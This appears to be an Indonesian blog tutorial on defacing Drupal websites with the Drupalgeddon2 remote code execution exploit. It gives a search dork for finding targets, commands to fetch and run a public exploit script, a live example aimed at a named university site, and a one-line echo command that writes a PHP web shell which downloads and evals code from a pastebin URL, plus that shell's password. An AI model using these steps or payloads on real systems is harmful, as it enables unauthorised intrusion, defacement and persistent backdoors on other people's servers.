Halo guys...Kali ini OMheker akan membagikan Tutorial Deface Menggunakan metode Drupal Geddon - RCE (Remote Code Execution) Ya langsung saja :
Dork : intext:"powered by drupal" (kembangkan)
Buka Termux/Terminal :
pkg install git
gem install ruby
github.com/dreadlocked/Drupalgeddon2
Buka Folder nya :
cd Drupalgeddon2
Cara menjalankan nya :
ruby drupalgeddon2.rb target.com
Contoh live :
ruby drupalgeddon2.rb http://school.unklab.ac.idJika berhasil, web tersebut akan connect ke terminal kalian.
Cek lah dengan perintah
uname -a
Jika muncul kernel nya berarti berhasil.
Langsung saja kita upload shell kita , disini saya menggunakan shell LamonganXploiter, kalian juga bisa mengubah shell nya, cara upload nya kalian hanya tinggal ketik :
echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php
Setelah terupload langsung saja kita cek shell kita di site.com/shell.php
Note*
Password Shell LAX adalah " LAX "
Mudah bukan?, Sampai Jumpa :D
Penulusuran terkait:
drupal rce
drupal rce
drupal rce exploit and upload shell
drupal exploit
drupalgeddon2 rb
deface drupal rce
cara deface dengan drupal rce
0 Response to "Drupal Geddon - RCE (Remote Code Execution)"
Post a Comment